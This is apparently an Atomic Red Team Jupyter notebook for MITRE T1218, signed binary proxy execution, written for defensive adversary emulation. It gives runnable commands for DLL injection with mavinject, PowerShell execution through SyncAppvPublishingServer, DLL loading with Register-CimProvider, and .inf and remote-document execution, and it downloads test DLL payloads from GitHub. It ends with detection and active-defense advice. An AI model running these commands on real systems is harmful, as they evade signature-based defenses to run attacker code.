{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1218 - Signed Binary Proxy Execution",
    "\n",
    "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - mavinject - Inject DLL into running process\nInjects arbitrary DLL into running process specified by process ID. Requires Windows 10.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Dependencies:  Run with `powershell`!\n##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218\\src\\x64\\T1218.dll) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218\\src\\x64\\T1218.dll) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll\" -OutFile \"PathToAtomicsFolder\\T1218\\src\\x64\\T1218.dll\"\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1218 -TestNumbers 1 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nmavinject.exe 1000 /INJECTRUNNING PathToAtomicsFolder\\T1218\\src\\x64\\T1218.dll\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1218 -TestNumbers 1"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code\nExecutes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nSyncAppvPublishingServer.exe \"n; Start-Process calc.exe\"\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1218 -TestNumbers 2"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #3 - Register-CimProvider - Execute evil dll\nExecute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB\n\n**Supported Platforms:** windows\n#### Dependencies:  Run with `powershell`!\n##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218\\src\\Win32\\T1218-2.dll) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218\\src\\Win32\\T1218-2.dll) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll\" -OutFile \"PathToAtomicsFolder\\T1218\\src\\Win32\\T1218-2.dll\"\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1218 -TestNumbers 3 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nC:\\Windows\\SysWow64\\Register-CimProvider.exe -Path PathToAtomicsFolder\\T1218\\src\\Win32\\T1218-2.dll\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1218 -TestNumbers 3"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #4 - InfDefaultInstall.exe .inf Execution\nTest execution of a .inf using InfDefaultInstall.exe\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml\n\n**Supported Platforms:** windows\n#### Dependencies:  Run with `powershell`!\n##### Description: INF file must exist on disk at specified location (#{inf_to_execute})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218\\src\\Infdefaultinstall.inf) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218\\src\\Infdefaultinstall.inf) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf\" -OutFile \"PathToAtomicsFolder\\T1218\\src\\Infdefaultinstall.inf\"\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1218 -TestNumbers 4 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nInfDefaultInstall.exe PathToAtomicsFolder\\T1218\\src\\Infdefaultinstall.inf\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1218 -TestNumbers 4"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File\nEmulates attack via documents through protocol handler in Microsoft Office.  On successful execution you should see Microsoft Word launch a blank file.\n\n**Supported Platforms:** windows\n#### Dependencies:  Run with `powershell`!\n##### Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path \"C:\\Program Files\\Microsoft Office\\Office16\\protocolhandler.exe\") {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nwrite-host \"Install Microsoft Word or provide correct path.\"\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1218 -TestNumbers 5 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nC:\\Program Files\\Microsoft Office\\Office16\\protocolhandler.exe \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1218 -TestNumbers 5"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Shield Active Defense\n### Software Manipulation \n Make changes to a system's software properties and functions to achieve a desired effect. \n\n Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.\n#### Opportunity\nThere is an opportunity to block an adversary's intended action and force them to reveal additional TTPs.\n#### Use Case\nA defender can monitor operating system functions calls to look for adversary use and/or abuse.\n#### Procedures\nHook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities.\nHook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use.\nAlter the output of an adversary's profiling commands to make newly-built systems look like the operating system was installed months earlier.\nAlter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data."
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}